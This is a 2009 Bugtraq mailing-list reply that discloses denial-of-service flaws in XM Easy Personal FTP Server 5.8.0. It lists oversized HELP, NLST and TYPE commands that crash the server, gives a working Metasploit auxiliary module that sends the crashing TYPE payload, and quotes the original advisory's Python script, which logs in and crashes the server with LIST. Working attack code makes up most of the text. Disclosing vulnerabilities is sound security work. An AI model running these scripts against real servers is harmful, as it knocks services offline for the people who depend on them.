Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability

[Protek Research Lab <protekresearchlab@xxxxxxxx>]

Hi,
It's seem to have much more bugs then what you listed in your advisory.

It's possible to DoS the server with this 3 others commands;

HELP ('A' * 90000)
NLST ('A' * 90000)
TYPE ('A' * 90000)

Here is an auxiliary module for metasploit...

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::Ftp
        include Msf::Auxiliary::Dos      

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'XM Easy Personal FTP Server 5.8.0 Type  DoS',
                        'Description'    => %q{
                                You need a valid login to DoS this FTP server, but
                                even anonymous can do it as long as it has permission
                                to call Type.
                        },
                        'Author'         => 'Francis Provencher, Protek Research Lab',
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 1 $',
                        'References'     => [
                                [ 'URL', ' http://protekresearch.blogspot.com]
                        ],
                        'DisclosureDate' => '2009/11/10')
                )

                # They're required
                register_options([
                        OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
                        OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
                ])
        end

        def run
                return unless connect_login

                raw_send_recv("TYPE  #{'A' * 90000}\r\n")

                disconnect

                print_status("OK, server may still be technically listening, but it won't respond")
        end
end


 have a nice Day!

--- On Tue, 11/10/09, zhangmc@xxxxxxxxxxxxxxxx <zhangmc@xxxxxxxxxxxxxxxx> wrote:

> From: zhangmc@xxxxxxxxxxxxxxxx <zhangmc@xxxxxxxxxxxxxxxx>
> Subject: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Received: Tuesday, November 10, 2009, 3:07 AM
> Date of Discovery: 10-Nov-2009
> 
> Credits:zhangmc[at]mail.ustc.edu.cn
> 
> Vendor: Dxmsoft
> 
> Affected:
> XM Easy Personal FTP Server 5.8.0
> Earlier versions may also be affected
> 
> Overview:
> XM Easy Personal FTP Server is a easy use FTP server
> Application. Denial of service vulnerability exists in XM
> Personal FTP Server that causes the application to crash
> when the "LIST" is sent to FTP server if you do not use
> "PASV" or "POST" first.
> 
> Details:
> XM Easy Personal FTP Server can't handle "LIST" command if
> you do not use "PASV" or "POST" first.If you have logged on
> the server successfully,a "LIST" command will lead the ftp
> server to crash.
> 
> Severity:
> High
> 
> Exploit example:
> #!/usr/bin/python
> import socket
> import sys
> 
> def Usage():
>     print ("Usage:  ./expl.py
> <serv_ip>      <Username>
> <password>\n")
>     print ("Example:./expl.py 192.168.48.183
> anonymous anonymous\n")
> if len(sys.argv) <> 4:
>         Usage()
>         sys.exit(1)
> else:
>     hostname=sys.argv[1]
>     username=sys.argv[2]
>     passwd=sys.argv[3]
>     sock = socket.socket(socket.AF_INET,
> socket.SOCK_STREAM)
>     try:
>         sock.connect((hostname, 21))
>     except:
>         print ("Connection error!")
>         sys.exit(1)
>     r=sock.recv(1024)
>     sock.send("user %s\r\n" %username)
>     r=sock.recv(1024)
>     sock.send("pass %s\r\n" %passwd)
>     r=sock.recv(1024)
>     sock.send("LIST\r\n")
>     sock.close()
>     sys.exit(0);
> 
> 
> 


      __________________________________________________________________
The new Internet Explorer® 8 - Faster, safer, easier.  Optimized for Yahoo!  Get it Now for Free! at http://downloads.yahoo.com/ca/internetexplorer/